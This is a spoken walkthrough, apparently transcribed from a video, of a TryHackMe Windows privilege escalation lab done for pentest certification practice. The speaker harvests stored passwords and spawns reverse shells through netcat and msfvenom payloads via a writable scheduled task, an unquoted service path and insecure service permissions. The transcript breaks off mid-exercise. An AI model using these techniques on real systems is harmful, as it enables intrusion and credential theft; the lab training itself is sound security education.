Hello and welcome back. It's your boy Hank Hackerson at Hank Hacks Hackers, and today we're going down the CompTIA PenTest Plus pathway on TryHackMe. We're going to be doing Windows Privilege Escalation, which is, I remember it was kind of a pain in the ass when I originally did it, but hopefully today it'll be a little bit easier. This is a subscribers only room, meaning you need some kind of not some kind of, you need the VIP subscription, or just, it's basically the paid subscription to TryHackMe, and you can use it and, hack a Windows machine to your heart's content, essentially. The link in the description below will give you a discount on the VIP subscription, the paid subscription, and you can just use that to get access to this. Or if you have a Windows machine that you can use as your victim, or you want to get one through a service like Linode or something like that, I'll probably get an affiliate link to that at some point. But you're more than welcome to do that. It's just I use TryHackMe because it's much more easier and a lot more convenient to do everything in one location. And obviously there's the tutorials and all that stuff. So if you want to just follow along the videos yourself, you're more than welcome to. If you like, subscribe, and turn on the notification bell, then you will get a notification the next time a video comes out, and then we'll just kind of go down the pen test pathway together. So without further ado, let's go into the introduction of the room. All right, so during a pen test, you will often have access to some Windows hosts with a privileged user. And unprivileged users will hold limited access, including the files and folders only, and they have no means to perform administrative tasks on the host, which prevents you from having complete control over the target. So this room will cover fundamental techniques that hackers and attackers can use to elevate privileges in a Windows environment, allowing you to use any initial unprivileged foothold on a host to escalate to an administrator account wherever that is possible. So if you want to brush up your skills, you can have a look through the Windows Fundamentals module or the Hacking Windows modules. I think I've done both of these. I've done Windows Fundamentals, and I've actually done Hacking Windows also. And so these are also a series of free rooms, as well as a couple of paid rooms using Metasploit and everything like that. So it's, it should be relatively easy for me to do this. Hopefully I can give you a good breakdown on some good instructions so that you also have an easy time doing this. And yeah, that's pretty much it. So let's continue here. Okay, so Windows Privilege Escalation consists of using given access to a host with user A and leveraging it to gain access to user B by abusing a weakness in the target system. So while we usually want user B to have administrative rights, sometimes they don't, and so we'll need to escalate into other unprivileged accounts before actually getting administrative privileges. Gaining access to different accounts can be as simple as finding credentials in text files or spreadsheets left unsecure by some careless user but that won't always be the case. So depending on the situation, we might need to abuse some of the following weaknesses, which could be misconfigurations on Windows services or the scheduled tasks. It could be excessive privileges assigned to the account that we have, the vulnerable software, and missing Windows security patches. So before we actually get all that, let's look at what some of the different account types are. So you have administrators, which basically they have the most privileges and they can do anything. They can change system configuration and access any file in the system. You have standard users, and these can access the computer, but they can only perform limited tasks. Typically, they can't make any permanent or essential changes to the system, and they can only access their own files and folders. Then you have any user that's an admin that's part of the admin group, and standard users are only part of the users group, right? In addition to that, you'll also hear about some special built-in accounts that are separate from the other two accounts, which is the system and local system account, which can be used by the operating system to perform internal tasks. It has full access to all files and resources available on the host, with even higher privileges than the administrators. This is very interesting to think about because it's the system, right? So the system gave the admin privileges, so technically the system should have higher privileges than the admin. Then you have the local service, which is the default account used to run Windows services with minimum privileges. It will use anonymous connections over the network, has the least amount of privileges. And default accounts, which are called network service, used to run Windows services with minimum privileges. It will use the computer credentials to authenticate through the network. So local service is probably lower than network service because it uses anonymous connections, whereas network service will actually use the computer credentials to authenticate through the network. So users that can change system configurations are part of the admin, and the system account has more privileges than the admin, that's true. So that is our basic Windows privilege escalation breakdown. Okay, so harvesting passwords from usual spots. So I'm going to start the machine, which we probably will need to use. And the easiest way to gain access is to gather credentials, so on and so forth. Let's see. It says before you get into the task, you got to start the machine, and then you got to use the attack box, which is a good moment to start because you'll be needing it for the following tasks. So you can also do machine via RDP, which is remote desktop, and that's the username and password to do it. And so I'm going to start the attack box as well. I think I will have to do remote desktop, right? So this is the Windows machine that's loading for us, and then we have the attack box that's loading for us. So we're going to have two machines to work with here. So the unattended Windows installations. So when installing Windows on a large number of hosts, administrators may use Windows deployment services, which allows for a single operating system image to be deployed to several hosts through the network. These kinds of installations are referred to as the unattended installations, as they don't require user interaction. Such installations require the use of an administrator account to perform the initial setup, which might end up being stored in the machine in the following locations. So the initial setup being used by the admin account could be in unattend, XML, Windows Panther unattend, Windows Panther unattend, unattend, and then Windows System, sysprep, and Windows System, sysprep, sysprep. So it could be any of these that have the, installations that you require the use of administrator, and these might end up being stored here. And then as part of these files, you might encounter credentials. So within any of these files, there could be a little section that says credentials, username, administrator, domain, so on and so forth, password, password. So that's a neat little trick. And then we have PowerShell history. So this is actually one of those things that I was like, wow, this is kind of cool that this exists too. So, and it's kind of common sense too. So whenever somebody runs a PowerShell command, it stores it into a file that keeps a memory of the past command, so the history of all the PowerShell commands, right? And so this is good for repeating commands that you've used before quickly, and that's when you press up on the arrow keys and it goes through all your previous commands. So that's what that history is, right? So if a user runs a command that includes a password directly as a part of the PowerShell command line, it can later be retrieved by using it through this cmd exe, which is different from PowerShell. So this is the command terminal, and then there's the PowerShell terminal. And then so you would run this essentially to get the console history. And so it's, user profile, app data, roaming, Microsoft Windows, PowerShell, PS readline, and console host history.txt. And so the command above will only work from cmd, as PowerShell won't recognize the user profile variable. And to read the file from PowerShell, you would have to replace user profile with environment user profile. So it can work, you just have to replace this section with this piece of code. So saved Windows credentials. So if you can use other user credentials, this is also the option that gives you the option to save these on the system. The command below will list saved credentials. So cmd key list. While you can't see the actual passwords, if you notice any credentials worth trying, you can use them with run as and the saved or save cred option. So run as, the save credentials, user admin, and cmd exe. So this is the saved credentials for the user admin, and then we're running command line with that. And so this is, I believe, also in PowerShell because we're trying to run that, or it could just be a command line probably. So you have the Internet Information Services, the default web server on Windows installations. The configuration of websites on IIS is stored in a file called web configuration and can store passwords for databases or configure authentication mechanisms. Depending on the installed version of IIS, we can find web config in one of the following locations, which would be these things. And here's a quick way to find database connection strings. And so type in this C, we're going to look inside of this thing, and then you put the pipe, and then you do find string connection string. And so it will look for the connection string to try to give you access to that. So retrieve credentials from PuTTY. It's an SSH client commonly found on Windows. Instead of having to specify a connection's parameters every single time, users can store sessions where the IP, user, and other configurations can be stored for later use. While PuTTY won't allow users to store their SSH password, it will store proxy configurations that include clear text authentication credentials. So to retrieve the stored proxy credentials, you can search under the following registry key for the proxy password with the following command. So registry query, and this is where we are searching, and then we're going to search for proxy. So Simon Tatham is the creator of PuTTY, and his name is part of the path, which is right here, not the username for which we are retrieving the password. The stored proxy username should also be visible after running the command above. So just as PuTTY stores credentials, any software that stores passwords, including browsers, email clients, FTP, so on and so forth, will have methods to recover any passwords the user has saved. So a password for Julia Jones has been left on the PowerShell history. What is the password? So let's run the command and try to find those things. And obviously the answer was on the screen. I do realize that the answer was on the screen. I understand that. I realize that. But we want to run these commands and actually see what we can find here. So this is the PowerShell history command. And so I am going to go here, and I think I can also do Control R, but since it's a Windows machine, but I'm on a Mac, so it might be a little bit difficult. So basically what we're going to do is we can either go to Start, and then from here we can find PowerShell, which is right here, and that'll open up for us. And we could also do Start and try to find command, which actually I don't think is on here. So what we can do is we'll do in the search, we'll do cmd.exe. Windows is typically slower than the Linux machines, and so there's the command prompt. And so let's see, the command itself is this thing, which is a pretty long one. So I'm just going to copy this. Okay, so that's our full command, and we're going to press enter. It can't find the path specified, so I misspelled something. Okay, here we go. So I actually, the mistake that I made was over here. I put a $sign after user profile instead of putting a percentage sign. So that's what it was. And so here is the file, and it opens it up nicely in a text reader for us. And look at that. User Julia Jones, password is whatever the hell that is. Whatever. So there you go. Just like that, we found Julia's password, and there it is. So web server is running on the remote host. Find any interesting password on web config files associated with IIS. What is the password of the DB admin user? So IIS web config, and so we're just trying to find this thing right here. So the instructions say configuration of is stored here, and stored passwords of that are stored there as well. Depending on the installation, we can find web config in one of the following locations. And so in this particular example, it's in this location. So we are going to type this command and see if we can find it. So I can close that real quick, and let's type this out. Okay, so here's the full command. We got, type C Windows Microsoft.NET frameworks v whatever config web config, and then there's the pipe right here, and then find string connection string. And so it found it for us, and this is the full thing right here. And right here, we got user ID DB admin, password is that thing right there. And so that is the password for the DB user admin. So now, there is a saved password on your Windows credentials using CMD key and run as. Spawn a shell for Mike Katz and retrieve the flag from his desktop. So there's a saved password on your Windows credentials using CMD key and run as. Okay, so first we just run CMD key list and it shows us, so currently stored credentials is Mike Katz on this such and such, and it's saved the password for homeboy. So now we're gonna run this thing. So run as saved cred user Mike Katz and then CMD exe. So let's do that, and there we go. So it spawned a new shell for us. So this was the shell that I was in, and I ran the run as command, so on and so forth, attempting to start CMD as user Mike Katz, and it started this thing for me. So I wonder if does who am I working here? It does. So there it is. So who am I? I am Mike Katz, and so now I need to find his. Holy shit! Oh my god! I don't know where I was. So I print working directory, or get working directory. Dang. Oh well, I'm in Windows system, so I guess all of these freaking things are in his system. There's a lot of stuff. Oh my god. So what I'm trying to find is his freaking desktop. I guess I could just try desktop instead of scrolling through this whole thing. Cause yeah, I mean this is ridiculous. I'm just in the L's too. F that. Okay, so CD desktop. Will that work? There is no path specified. Okay, 1 second. Okay, so it's actually a lot simpler than I thought it was. The cd command will just tell us exactly where we are, and I think we need to go to cdc, and it'll be here just like that. And so if I do dir, it should, yeah, there we go. And so now I go to cd users and do a dir, and it'll give me Mike Katz. So cd Mike Katz and one more dir, and there is the desktop. So desktop, and on here should be the flag. There it is. So I think it's type flag.txt on Windows. There it is. Cool. So type is the equivalent of cat, so C-A-T in Linux. And so that's how you read a file, basically. And there is the password, or there's the flag, excuse me. That is the flag for Mike Katz. Cool. So now retrieve the saved password stored and saved in the PuTTY session under your profile. So what is the password for Tom Smith? So I'm guessing we got to go back to this one, which is the unprivileged user. And so what are we doing here? We're looking for the password stored in under your profile. What is that? So this is probably the command right here. SSH client, to retrieve stored proxy credentials, you can search under this for proxy password with the following command. So this is it, and let's see if we can actually do it. Okay, so that indeed worked. So we got, this is the command exactly as it was, and we ran it. And so it says current user yada yada yada, and you got all of this information, and voila, proxy username Tom Smith, password is cool pass 2021, bruh. So there we go. These were the exercises that we ran just to kind of get some passwords from usual locations, as it said. Let's see what other quick wins we can find here. So we have privilege escalation is not always a challenge. Some misconfigurations can allow you to obtain higher privileged user access, and in some cases even administrator access. It would help if you considered these to belong more to the realm of CTF events rather than scenarios you will encounter during real penetration testing engagements. However, if none of the previously mentioned methods work, you can always go back to these. So schedule tasks. Looking into schedule tasks on the target system, you might see a schedule task that either lost its binary or it's using a binary that you can modify. Can be listed from the command line using this, without any options to retrieve the detailed information about any of these services. And you can use a command like the following one. So schedule task, and then query the name of the task, and list, so on and so forth. So we can get a list of the tasks without any options, but then to retrieve detailed information about any of them, you can use a command like this one. So we're going to get a lot of information about the task, but what matters most is the task to run, which is this thing right here, which indicates what gets executed by the scheduled task, and the run as user parameter, which is the very next one, which shows us the user that will be able to execute the task. So if our current user can modify or overwrite that executable, we can control what gets executed by our user, which is us basically, resulting in a simple privilege escalation. So to check the file permissions, we can use icalcs, cackles, whatever. We can use this, and it will show the authority, right? So the authority is system, and so what does it say right here? Just to remind myself, it says that as can be, the built-in users group has full access. There you go. So F stands for full access over the task's binary. This means we can modify the .bat file and insert any payload we like. So for our convenience, the netcat exe can be found in tools, and let's change the bat file to spawn a reverse shell. So we would put this inside this, or I'm sorry, it's this whole thing. So we're going to echo this and execute a command line, and then we're going to put our attack box IP address on port 444, and we're going to put all of that inside this little thing. So then when we start a netcat listener on the attack box, we should see that the whole thing runs. So the next time that the task runs, we'll see that we'll get a reverse shell, and voila, becomes the reverse shell. And then we can go to his desktop to get a flag. So always install elevated. Windows installer files, also known as MSI files, are used to install applications on the system. They usually run with the privilege level of the user that starts it. However, these can be configured to run with higher privileges from any user account, even unprivileged accounts. This could potentially allow us to generate a malicious MSI file that would run with admin privileges. The always install elevated method won't work on this room's machine, and it's included as information only. Fine. So this method requires two registry values to be set, which is regquery, and both of them, oh, I see, these are the two values. So we're going to set those, and then to be able to exploit it, both should be set, otherwise exploitation is not possible. If these are set, you can generate a malicious MSI file using MSF Venom, as seen below, and this is going to be ran in your attack box, right? So you would run this inside the attack box machine, and then these things are done inside the Windows machine. And then so as that is a reverse shell, you should also run Metasploit handler module configured accordingly. Once you have transferred the file you have created, you can run the installer with the command below and get the reverse shell. So unfortunately, since this isn't available on the machine that we're running, we can't really run it, but it's fairly simple, I would say. So you just got to make sure that you run these two commands inside the Windows machine. Then you go to the attack box, which is a Linux machine, and you run this command to generate a reverse shell payload, and it's going to be called malicious MSI. And then as that is a reverse shell, you also need to run the Metasploit handler. Once you have transferred the file that you've created, you can run the installer with the command box. And I believe the Metasploit handler is what allows you to transfer the file, because when you create this, it's going to be on the Linux machine, and you need to be able to transfer it from the Linux machine to the Windows machine. And then once you do that, you can get access, or a reverse shell, as they say. And that's basically it, right? So what we're going to do, though, is we're going to run the first portion of this, which is this part, where we can modify the scheduled task And then from there, we're going to get a reverse shell or a netcat listener on our attack box. So I'm going to close this thing right here, and I'm going to go back to here. And the first thing that we want to do is just see what the scheduled tasks are. So as the command says, it's sch tasks, and that'll give us a list of all of the scheduled tasks. And so I guess the one that we're looking for is called the vuln task or the vulnerable task. Let's see. Okay, so it's literally the very first item. It's in the root folder, and it's called vuln task. And so next runtime is not available. Let's see. The status is ready though. So okay, so that's the task that we want to locate, or I mean we located, and it was the very first one. So now the next thing that we want to do is we want to run this particular command so we can get this detailed information from it. And I know that we already have it because it's literally on the screen, but we just want to get into the habit of running these things, okay? So that's kind of the whole idea here. So let's run that particular command and see what we can find. Cool, so we ran it. And this is the detailed information that we got, including a bunch of stuff, as they mentioned, which is the task name, specifically is this. And there was task to run, which is this thing. And the author is the administrator, obviously. And run as user, task user 1, right? So these are the various things that we wanted to find. But specifically, they mentioned that the one that we're trying to look for is this right here, which is the path of the actual task that's going to be ran. And then who are we going to run it as? We're going to run it as task user 1. So that being said, the next one is to try to find the permission of that file, right? So it's this command right here. So I cackles whatever the permission of this file. So I want to see what are the permissions of this thing. So we run it, and now we have these various permissions, and it says built-in administrators is full access, and NT authority system also gets full access on this thing, and built-in users also get full access on this thing. And I think we're one of those built-in users, right? So we should be able to get full access of that, which means we can modify it. So now what we're gonna do is we're going to echo this little payload inside of that little file, right? So that the next time that it actually runs, we'll be able to see, or we'll hopefully get a reverse shell in our attack box. So we are going to type out this command here. And so there's the command, and this is the attack box IP address that was assigned to me on port 444, and we're going to transfer it into that file. So we press enter, and it should process fairly simply. Okay, there you go. So a little glitch keeps coming up when I try to switch between the attack box and the Windows machine inside of this window. So I just opened up the attack box in a new tab for myself, so I can just kind of switch back and forth, and this thing won't give me any glitches. So finally it worked. So it actually allowed me to execute that command. So now what we can do is we'll go to our attack box and open up a netcat listener, and from here we should be able to actually get that shell, right? So here we go, and there it is. So very simple, netcat -lvp 4444, and that is basically the command. And so now what we're going to do is we're actually going to run the scheduled task, because if you remember when we checked the information about it, there is no next run time. It was just like not available. So that means that we actually have to run it, and we're going to manually do it. So if we go here and we do schedule tasks, run tn vuln task. That's basically it. Success attempted to run the scheduled task vuln task. And so now we look here and look at that. We have a Windows shell, and if I run who am I am not, oh, there it is. So task user 1, which is the person who created that task. So now we can actually go to his desktop, I guess, right? And find the flag, because we're on the Windows System 32, And so if I just do cd, it'll say that's exactly where I am. So what I'm going to do is I'm going to change that to cd c, and then that's it. And so now I'm on here. And so if I do dir, because we are using a Windows machine, ls does not work. And there it is. So there we go. And so now we're going to go into users and do a dir command, and it gives us that. And so task user 1, there he is. So task user 1. So we're going to go into his desktop, and from here there should be a desktop. So I'm just going to assume that there's a desktop, and we're going to go in the desktop. There it is. So we're going to do a dir right here, and there's the flag. So I want you to type out that flag for me, and there is it. Task, there it is. Task completed, which is the flag that we were looking for, and there it is right there, task completed. So nicely done. I'm very, very excited that we're getting through this relatively simply, with the exception of the switching of the back and forth. So if you're actually running this, and that's the glitch that you're running across, just open the attack box in a new window or a new tab, and you should be fine. So that was a pretty quick win that we just got from running a scheduled task. Okay, so let's abuse some service misconfigurations here. And this one is kind of a lengthy one. Look at that. Yeah, there's a lot going on in this one. Okay, so we'll do it one at a time, I guess, right? Let's see. So Windows services can be found by just doing an SC command right here. So it says there are services managed by a service control manager. It's a process in charge of managing the state of services as needed and checking the current status of anything and providing a way to configure services. Each service on a Windows machine will have an associated executable which will be run by the SCM whenever a service is started. It is important to note that service executables implement special functions to be able to communicate with the SCM, and therefore not any executable can be started as a service successfully. Each service also specifies the user account under which that it will run. So to understand it, let's just check the app host service service configuration with the scqc command. So scqc will bring up the service information, and so it says, you know, this is what it is, this is what it starts as. Error control is normal. The binary path is over here, and the service start name is the local system. That's basically information. And so the service start name parameter and the binary path parameter are the ones that we're most interested in. Services have a discretionary access control list, DACL, which indicates who has permission to start, stop, pause, and query the status, query configuration, or reconfigure the service, among other privileges. So the DACL can be seen from Process Hacker, available on the desktop, and this is basically what it looks like. And so the app host service properties are going to be under security. It says these are the groups and users that can access this thing, right? So all the services configurations are stored on the registry under HCLM system current control set services. And so we can go to the registry editor and navigate to this accordingly. And instead of having to like do drop downs, you can see that you could just type it in, and you could just literally type these things in and it'll show it up for you. A subkey exists for every service. Again, we can see that the associated executable on the image path value and the account used to start the object name value. If it's been configured for the service, it will be stored in a subkey called security. As you've guessed by now, only administrators can modify such registry entries by default. And so this is kind of what we're looking at over here. And we're gonna try to find the insecure permissions on these now. So to understand how this works, let's look at a vulnerability found on Splinterware System Scheduler. To start, we will query the service using scq Windows Scheduler, and it shows us the binary path as well as who can use it, which is svc user. We can see that it's installed and can run as svc user on this binary path. We then proceed to check the permissions on the binary path, which is icackles, whatever, and the path of the binary, and so it says everyone can I don't know what I is, and M, I think manage may be it. The authority system has full access. The built-in administrators full access. Built-in users have RX. And so let's see what it tells us right here. We have something interesting. The everyone group, which is at the very top, has modified permissions. There you go. That's what M stands for. Has modified permissions on the service's executable. This means that we can simply override it with any payload of our preference, and the service will execute it with the privileges of the configured user account. So what we're going to do is we're going to create a payload on MSF Venom and create a Python web server on the attack box, which is, this is one of my favorite commands that I learned throughout this process, because you can create a little server on your machine and then you can access it from basically any other machine. And so once you've created the payload, you will create a web server, and then you go into the Windows machine, and it needs to be on PowerShell specifically. And all of these things have been on the command prompt. So in this case, it needs to be on the PowerShell, and then you're going to run wget, and then the attack IP or the attack box IP on the port that we have assigned to it. And then this is the name of the executable, and we're going to output it to that same name on our desktop or whatever file we're in. And so once the payload is in the Windows server, we proceed to replace the executable with our own executable. Since we need another user to execute our payload, we'll want to grant full permission to everyone, to the everyone group as well. And so we're going to change directory to the system, and then move this service to that service backup, and then move the executable to wservice.exe, which is this thing now. So it basically means now we're replacing this with this, and then now we're going to give it permission. So we're going to give this thing permission, grant everyone has full access, and then we're going to go to attack box, create a netcat listener, and then stop the service, and then start the service. And PowerShell has sc as an alias to set content. Therefore, you need to use sc.exe if you're going to do it in PowerShell, but we're just going to end up using the command prompt just to make it simpler. And as a result, you'll get a reverse shell. And so we're going to go to their desktop to retrieve the flag. Don't forget to input the flag at the end. So that's one thing that we did. And so we have the unquoted service path, which is this thing right here that we're going to mess with right here. So what that means is that a very particular behavior occurs when a service is configured to point to an unquoted executable. By unquoted, we mean that the path of the associated executable isn't properly quoted to account for spaces on the command. So as an example, we're going to look at the difference between two services. They are used as an example only and might not be available in the machine. So this is kind of an example. I don't think we're going to be able to run this one. So the first service will use a proper quotation so that the SCM knows without a doubt that it has to execute the binary file pointed by such and such, so followed by the given parameter. So if we did scqc, which we're basically querying for this, we're going to get this specific thing, and it's going to give us the path name, and it does have quotes, right? It has quotes around it because there's spaces between these things, and so you need to have quotes around it to be able to make it one solid path, right? So scqc disk sorter enterprise is unquoted, as you can see, and so that means that these spaces will most likely cause some kind of a glitch. So when the service manager tries to execute the associated binary, a problem arises. Since there are spaces in the name of disk sorter enterprise folder, the command becomes ambiguous, and the SCM doesn't know which of the following you're trying to execute. Are you trying to do disk sorter, or disk sorter enterprise such and such, right? So that's the issue with having unquoted services, and so, or unquoted paths. So this has to do with how the command prompt parses a command. Usually when you send a command, spaces are used as argument separators unless they are part of the quoted string. This means the right interpretation of the unquoted command would be to execute this thing, right? Because it stops, that space stops. Instead of failing as it probably should, it actually tries to help the user and starts searching for each of the binaries that are shown in the table. So it could be the disk exe, and if it exists, it'll just run it. If it doesn't exist, it's going to look for disk sorter exe. If it exists, it'll run it, and if that doesn't exist, it's going to look for the final variation, right? This option is expected to succeed and will typically be run in a default installation. From the behavior, the problem becomes evident. If an attacker creates any of the executables that are searched for before the expected service executable, then they can force the service to run an arbitrary executable. So it may sound trivial. Most of service executables will be installed under program files or program files 86 by default, which isn't writable by any unprivileged users. This prevents any vulnerable service from being exploited. There are exceptions to this. Some installers change the permissions on the installed folders, making the service vulnerable. An administrator might decide to install the service binaries in a non-default path. If such a path is world writable, meaning everybody can write to it, the vulnerability can be exploited. In our case, administrator installed disk sorter binaries under my programs. By default, this inherits the permission of the C directory, which allows any user to create files and folders in it. We can check this by doing iCackles my programs, and it says as such, right? So authority system has full, administrators have full, built-in users can do RX. So let's see, built-in users has AD and WD, allowing the writers to create or add directories and write directories. I think that's what that means. And files respectively. The process of creating an exe service payload for MSF Venom and transferring it is the same. So feel free to create the following payload and upload it, but we will start a listener. We will also start a listener to receive the reverse shell. I mean, so if they're giving this set of instructions to us and they're saying feel free to execute, I feel like we can do this part of the exercise as well. So once the payload is in the server, move it to any of the locations where hijacking might occur. In this case, we're going to move it to my program's disk exe, and so it's move this thing, which is the executable that we just created, and we're going to move it to this directory under that name, and then we got to give it permission. So we're going to do iCackles on that, grant everybody full permission, and once it's transferred, we're going to stop it and then restart it. And then as you can see, it will give us a flag. Oh, so, and it says you got to go to retrieve the flag. So that means that we can do that part of the exercise also. So insecure service permissions, slight chance of taking advantage of a service. If a service executable is well configured and the service binary is rightly quoted, should the service DACL not allow you to modify the configuration, you'll be able to reconfigure the service. This will allow you to point to any executable and run it with any account you prefer, including the system itself. So to check for the discretionary access control from the command line, you can do access check from sysinternals. For your convenience, a copy is available under tools. The command to check for THM service is DACL is such and such. So in tools access check, we're going to run the access check exe QLC THM service, and it'll show you the authorities, so on and so forth. Here we can see that the built-in users, where is it? Right here. Group has service all access permission, which means any user can reconfigure the service. So we're going to create a payload and we're going to transfer it using Python server, and we're going to store it inside this thing, grant everyone permission, and once it's want to change the service associated with that account, we are going to use the following command: mine the spaces after the equal sign. So scconfig THM service binary path, there's a space right here, and then we're going to run that whole thing. Object, there's a space after that, local system. And now we can use any account to run the service. We chose local system as it is the highest privilege account available. To trigger the payload, all we got to do is stop and start the service, and then we will get a shell. So we're going to run 3 different commands or 3 different sets of exercises, and we're going to try to retrieve these flags. As such, let's go back to the top and start these exercises. Okay, so I am going to first transfer myself into the root folder here, and we're going to do scqc Windows Scheduler. And so as it says, it shows where the binary is located, and it shows the service start name, which is important for us to know. And so now what we need to do, it's installed by vulnerable software, and it runs as SVC user. So we can check the permissions as such. So I can do icackles c progra 2, and that's a weird little squiggly line, and then system 1, and then wservice.exe. And there are our permissions. And so authority system can, or excuse me, everyone can modify. That's the thing that we are looking for specifically. So we see that everyone has permissions to do it. So now we're going to create a payload using MSF Venom, and we're going to serve it through a Python server. So I'm just going to copy this because I know I can paste into this specific machine right here. So we're going to exit here, and we're going to paste our payload command there. So MSF Venom, P is for payload, and just to kind of break this down for you, MSF Venom, P is for payload, and then this is the name of the payload that you want to create. And if you go to the Metasploit video that we did, you can see how you can find all of the different payloads that are existing. And so this is a Windows payload for version 64, and we're creating a reverse TCP shell. And the local host is going to be the attacker IP that I got to change, and it's going to be on this port. And then the file is going to be exe service, and we're going to output it on revservice.exe. So that's basically what we're doing. And so all I got to do is, first actually what I'm going to do, because I want to see where I am, print working directory, we're in root, ls is going to be here, so root, okay, that should be fine. So then we're going to paste the command one more time, and we're gonna go back and change the IP address to the attack box IP address. 10.10.155.173, and there's that on local port, or listen port, excuse me, listen host and listen port. And so now we're good. So press enter, and it's going to take a few seconds, and it's going to create that executable for us. All right, cool. So it finished. We didn't select certain things, so this is not a big deal. What we are looking for is final size is this, and it's saved as that. So if I run the ls command, we should now see it in our current directory, and there it is. And so now we can create our Python server. So Python 3 m http.server, just like that. And now you have your server created, which means this machine is serving. So we're going to go here, and we're going to use PowerShell to retrieve it, right? So it is 10.10.155.173 on port 8000, as it says right here. So we're going to go to PowerShell right here, and we're going to, I guess, just download it no matter what, right? So it doesn't matter where we are, wget http 10.10.155.173 on port 8000, and it's going to be revservice.exe is what we saved as, and output to revservice.exe. There you do that. And so if I go over here, it should say that this IP, which is the Windows machine, just got that, and status of 200 means that it was successful. So we did get it. So if we do a basic dir command, it should show it to us, and it is in fact right there. So now we have our service executable. So now the situation is that we're going to go into the path that this binary exists in, the W service binary, and once we're inside that, we're going to move this, which means we're just going to duplicate it. So we're going to duplicate that service into a backup, which is what that stands for. .bkp means it's a backup. So we have a backup of it, and then we're going to move the payload that we just created into this name. And so that should be all good. And then we're going to change the permissions to grant permissions to everybody. So we're going to go back into our command line, and we're going to go cd into that path. Okay, so once we're inside the path, we are going to move. And so let's just do a little dir and see if we can find it. Right there it is, wservice.exe. So what we're going to do is now we're going to create a backup of this. So it's going to be move wservice.exe into wservice.exe.bkp. So now we have a backup. So there you go. And so now you can see that there is two of them. Or excuse me, not two of them, my bad. So it just renamed it. That's what move does. So it renames it for us. So there we go. It just renamed it for us, and it replaced the other W service. So now what we can do, since we're here, we are going to move from the users and THM unprivileged user, which is who we're technically are right now. We're going to take it from where it was to the new thing. So service. Okay, so that worked. And so now we actually have both of them again, because we moved the other one to this one here now. And so now that has worked, we're going to change the permission iCackles wservice.exe to grant permission to everyone, and we want full permission. And there it goes. So you got grant permission to this, everyone gets full permission. So now we got that. So now what we got to do is go back to our attack box, start the listener, and then start and stop the service, and we should have a reverse shell. Okay, so there you go. We got the listener on port 4445, which is the port that we assigned up here when we were creating the payload. So now we're going to go here, and we are going to start and stop the service. So you do sc stop Windows scheduler and stop pending. Very good. So sc start Windows scheduler, and there you go. So we stopped it, and it says stop pending, but that basically means it's stopped. And then you start it again by doing sc start Windows scheduler, and now it says it's running. So now when I switch to the other tab, we should have our specific shell, and we do. Look at that. I love it when these things work. So if I do cd just to see where we are, Windows, and who am I am service user 1. And so what we're going to do is we're going to cd into the users desktop, no, users svc user 1 desktop. There it is. Do a dir. There's the flag. And so type flag onto the screen, and there's our flag. So at your service, and we got it. And so that is the flag for this one, and that becomes the answer to the first one right here. So at your service. So moving on from that one into the next one, which is the unquoted, right? Yeah, so insecure permissions. And now we're going to go into the unquoted one. So if we want to verify to see what is actually not running correctly, so we're going to go back into our main root directory here, and we're going to do scqc disk sorter enterprise. And so bring it up, and then we'll see that this thing does not have quotes around it, right? That's the whole issue that makes this vulnerable, which means that we can make this specific part, because there is a disk.exe that exists somewhere. So since we can take advantage of this, what we're going to do is we are going to go to check in my programs, for example. So there's my programs right there. So iCackles, I guess, see my programs, and it'll show us that the built-in users group have the permission to create subdirectories and files respectively, So subdirectories and files, add a directory, add a file, right? So that means that we can create a shell once again, and in this particular situation we're going to put it on port 446 and create a Python server and transfer it to our machine here using PowerShell. And once it's here, we're going to move it from where it is, which is the unprivileged user, and we're going to move it into micro programs disk, and then we're going to change that permission, start and stop the service, run the netcat listener, and it should give us new access. So first and foremost, we're going to go back real quick. We're going to create this payload right here. So copy, and since we already got this, we can just exit out of this thing, and there we go, it exited. And so now I can verify that we're here, and I'm going to paste the command to create the payload. I need to change the attacker IP, which is very important. So we're going to do that, and it's going to be 10.10.155.173 on port 4446. We're going to create that. And so the command is it's almost identical to the previous command that we ran, which is MSF Venom. Payload is going to be the reverse shell for Windows. The listening host is our IP. The listening port is just a different port. And then execute a service, and there you go. We got the payload listed. So ls, there's the payload. So now Python 3 http.server to create a server on port 8000. And now we're going to go back here, and we're going to retrieve it one more time. So can you type or no? Okay, cool. We were able to do it. I actually had to restart this Windows machine because PowerShell wasn't allowing me to type in it. So you may run across that bug as well when you're doing this yourself. And yeah, I mean, sometimes you just got to restart the machine to make it work. But command line would let me type. PowerShell would not let me type. It would let me type numbers and certain symbols, but it would not take letters, which is very annoying. But now that we were able to run it, we just saw the confirmation here, and this is the new IP address that was generated for us, and it allowed us to take the payload that we wanted, and it was successful. So now we can go ahead and proceed with the rest of this, which is what we're supposed to do. We're supposed to move it and then change the permissions and then stop and start the service. So we're going to go back into the command prompt. We're going to move it first. Okay, the file was moved successfully, and now I'm going to do iCackles and change the permissions of it. And we're going to grant permissions to everyone, and it's going to be full permission. And we got full permissions now, so now we should be able to just start and stop the service, and we should get a reverse shell. So the first thing I'm going to do here is I'm going to go here, I'm going to terminate my server, and I'm just going to do a netcat LVP on 4445. I think that's the port, right? 4446. 4446. 446. We should be listening on port 4446. And now we're going to stop disk sorter enterprise. Okay, very good. And now we're going to start disk sorter enterprise. And it's all good. And if we go back, we indeed have a shell, ladies and gentlemen. So who am I here? Service user 2. Okay, so we're going to change the directory to cd users service user 2 desktop, and there it is, and there's our flag. So type flag.txt, and there it is, quotes everywhere. So that is that flag, and so if we go down here, that is indeed the flag for quotes everywhere, so for service user 2 or SVC user 2. So now the last one is on the admin desktop. So we gotta go, and let me see if this thing will let me type. Okay, good, it lets me type. It's so annoying, man. Okay, so in secure service permissions, so we are going to go into tools, and we're going to use the access check executable to look at the THM service permissions. So first let's run that real quick. So cd c tools access check, and there it is. And so we're going to see that we have the executables here. Very good. And so we are running the 64 version, 64.exe. So we're going to do that. Access check 64.exe, and you're going to do a QLC on the THM service. Okay. It lets me. Great. Look at that. And so we get all the information that we were looking for, specifically the service all access permission for built-in users. And so if we kind of zoom in here a little bit, it shows us right here. So it says access allowed ace type built-in administrators has all access. Oh, let's go to users. There we go. Users has all access as well. So that means that THM service has users for all people, which includes us, the unprivileged user. So what we're going to go do is we're going to go create a new payload, and it's going to be on 4447, but basically same exact payload, literally same payload. We're just going to put it on a different port now. And then let me see, PowerShell still, okay, PowerShell still lets me type. That's good. And so we're going to come back and we're going to exit out of this one, and we're going to paste our payload, and we're going to change the IP address to match our attacker IP address. And there's that. So same exact payload, press enter, should take a couple of seconds. Let's see if this thing still lets me type, and it does let me type. Great. And so once that's done, I'm going to, so it says, hold on, before changing the service, 